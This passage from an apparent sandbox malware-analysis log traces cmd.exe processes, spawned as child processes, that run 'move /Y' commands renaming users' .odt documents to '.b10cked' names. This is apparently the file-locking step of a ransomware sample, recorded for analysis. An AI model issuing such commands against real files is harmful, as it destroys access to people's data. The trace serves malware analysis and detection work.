out: lpType=0x18e7fc*=0x0, lpData=0x18e800*=0x40, lpcbData=0x18e7f8*=0x1000) returned 0x2 [0140.632] RegCloseKey (hKey=0x40) returned 0x0 [0140.632] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7f4 | out: phkResult=0x18e7f4*=0x40) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x0, lpData=0x18e800*=0x40, lpcbData=0x18e7f8*=0x1000) returned 0x2 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x1, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x0, lpData=0x18e800*=0x1, lpcbData=0x18e7f8*=0x1000) returned 0x2 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x0, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x9, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x4, lpData=0x18e800*=0x9, lpcbData=0x18e7f8*=0x4) returned 0x0 [0140.632] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7fc, lpData=0x18e800, lpcbData=0x18e7f8*=0x1000 | out: lpType=0x18e7fc*=0x0, lpData=0x18e800*=0x9, lpcbData=0x18e7f8*=0x1000) returned 0x2 [0140.632] RegCloseKey (hKey=0x40) returned 0x0 [0140.632] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.632] srand (_Seed=0x5b88636f) [0140.632] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT\" \"C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked\"" [0140.632] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT\" \"C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked\"" [0140.632] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.633] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3018c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.633] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.633] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.633] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.633] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.633] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.633] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.633] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.633] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.633] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.633] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.633] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.633] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.633] GetEnvironmentStringsW () returned 0x3022b8* [0140.634] FreeEnvironmentStringsW (penv=0x3022b8) returned 1 [0140.634] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.634] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.634] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.634] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.634] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.634] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.634] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.634] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.634] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.634] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.634] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f5c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.634] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f5c0, lpFilePart=0x18f5bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f5bc*="Desktop") returned 0x18 [0140.634] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.634] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f33c | out: lpFindFileData=0x18f33c) returned 0x2ffff8 [0140.634] FindClose (in: hFindFile=0x2ffff8 | out: hFindFile=0x2ffff8) returned 1 [0140.634] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f33c | out: lpFindFileData=0x18f33c) returned 0x2ffff8 [0140.635] FindClose (in: hFindFile=0x2ffff8 | out: hFindFile=0x2ffff8) returned 1 [0140.635] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f33c | out: lpFindFileData=0x18f33c) returned 0x2ffff8 [0140.635] FindClose (in: hFindFile=0x2ffff8 | out: hFindFile=0x2ffff8) returned 1 [0140.635] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.635] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.635] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.635] GetEnvironmentStringsW () returned 0x302ad8* [0140.635] FreeEnvironmentStringsW (penv=0x302ad8) returned 1 [0140.635] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.636] GetConsoleOutputCP () returned 0x1b5 [0140.636] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.636] GetUserDefaultLCID () returned 0x409 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f700, cchData=128 | out: lpLCData="0") returned 2 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f700, cchData=128 | out: lpLCData="0") returned 2 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f700, cchData=128 | out: lpLCData="1") returned 2 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.637] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.638] GetConsoleTitleW (in: lpConsoleTitle=0x2f08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.639] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.639] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.639] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.639] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.640] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.640] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.640] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.640] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.640] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.640] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.640] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.643] GetConsoleTitleW (in: lpConsoleTitle=0x18f3f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.030] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.030] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.030] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.030] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.030] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.030] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.030] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.030] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.030] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.030] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.030] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.031] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.031] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.031] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.031] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.031] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.031] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.031] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.031] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.031] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.031] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.031] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.031] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.031] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.031] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.031] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.031] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.031] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.031] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.031] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.031] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.031] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.031] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.031] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.031] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.033] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.033] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.033] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f1b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f1ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f1ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.035] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.035] _wcsicmp (_String1="EGB3US~1.ODT", _String2=".") returned 55 [0141.035] _wcsicmp (_String1="EGB3US~1.ODT", _String2="..") returned 55 [0141.035] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT" (normalized: "c:\\users\\eebsym5\\desktop\\egb3us~1.odt")) returned 0x20 [0141.035] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.035] SetErrorMode (uMode=0x0) returned 0x0 [0141.035] SetErrorMode (uMode=0x1) returned 0x0 [0141.035] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT", nBufferLength=0x104, lpBuffer=0x18eb3c, lpFilePart=0x18eb24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT", lpFilePart=0x18eb24*="EGB3US~1.ODT") returned 0x25 [0141.035] SetErrorMode (uMode=0x0) returned 0x1 [0141.035] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.036] _wcsicmp (_String1="EGB3US~1.ODT", _String2=".") returned 55 [0141.036] _wcsicmp (_String1="EGB3US~1.ODT", _String2="..") returned 55 [0141.036] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT" (normalized: "c:\\users\\eebsym5\\desktop\\egb3us~1.odt")) returned 0x20 [0141.036] SetErrorMode (uMode=0x0) returned 0x0 [0141.036] SetErrorMode (uMode=0x1) returned 0x0 [0141.036] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT", nBufferLength=0x104, lpBuffer=0x18efb8, lpFilePart=0x18ed50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT", lpFilePart=0x18ed50*="EGB3US~1.ODT") returned 0x25 [0141.036] SetErrorMode (uMode=0x0) returned 0x1 [0141.036] SetErrorMode (uMode=0x0) returned 0x0 [0141.036] SetErrorMode (uMode=0x1) returned 0x0 [0141.036] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked", nBufferLength=0x104, lpBuffer=0x18f1c0, lpFilePart=0x18ed50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked", lpFilePart=0x18ed50*="egB3USbk0IDbq.odt.b10cked") returned 0x32 [0141.036] SetErrorMode (uMode=0x0) returned 0x1 [0141.036] SetLastError (dwErrCode=0x0) [0141.036] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\egb3usbk0idbq.odt.b10cked")) returned 0xffffffff [0141.036] GetLastError () returned 0x2 [0141.036] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT", fInfoLevelId=0x1, lpFindFileData=0x18e6cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e6cc) returned 0x2f0f08 [0141.037] FindNextFileW (in: hFindFile=0x2f0f08, lpFindFileData=0x18e6cc | out: lpFindFileData=0x18e6cc) returned 0 [0141.037] GetLastError () returned 0x12 [0141.037] FindClose (in: hFindFile=0x2f0f08 | out: hFindFile=0x2f0f08) returned 1 [0141.038] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT", fInfoLevelId=0x1, lpFindFileData=0x301ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301ae0) returned 0x2f0f08 [0141.038] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked", nBufferLength=0x104, lpBuffer=0x18e964, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked", lpFilePart=0x0) returned 0x32 [0141.038] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt", nBufferLength=0x104, lpBuffer=0x18e964, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt", lpFilePart=0x0) returned 0x2a [0141.038] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt" (normalized: "c:\\users\\eebsym5\\desktop\\egb3usbk0idbq.odt")) returned 0x20 [0141.038] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt" (normalized: "c:\\users\\eebsym5\\desktop\\egb3usbk0idbq.odt"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\egb3usbk0idbq.odt.b10cked"), dwFlags=0x3) returned 1 [0141.039] FindClose (in: hFindFile=0x2f0f08 | out: hFindFile=0x2f0f08) returned 1 [0141.040] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e918 | out: _Buffer=" 1") returned 9 [0141.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.040] GetFileType (hFile=0x7) returned 0x2 [0141.040] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0141.040] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e8a4 | out: lpMode=0x18e8a4) returned 1 [0141.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.040] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e8d8 | out: lpConsoleScreenBufferInfo=0x18e8d8) returned 1 [0141.040] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0141.041] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e918 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0141.041] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e8fc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e8fc*=0x1a) returned 1 [0141.041] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.041] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.041] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.041] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.041] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.041] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.042] SetConsoleInputExeNameW () returned 0x1 [0141.042] GetConsoleOutputCP () returned 0x1b5 [0141.042] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.042] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.042] exit (_Code=0) Process: id = "165" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ae0" os_pid = "0xe54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14802 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14803 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14804 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14805 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 14806 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14807 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14808 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14809 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14810 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 14811 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16142 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16143 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16144 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16145 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 16146 start_va = 0x6a0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 16147 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16148 start_va = 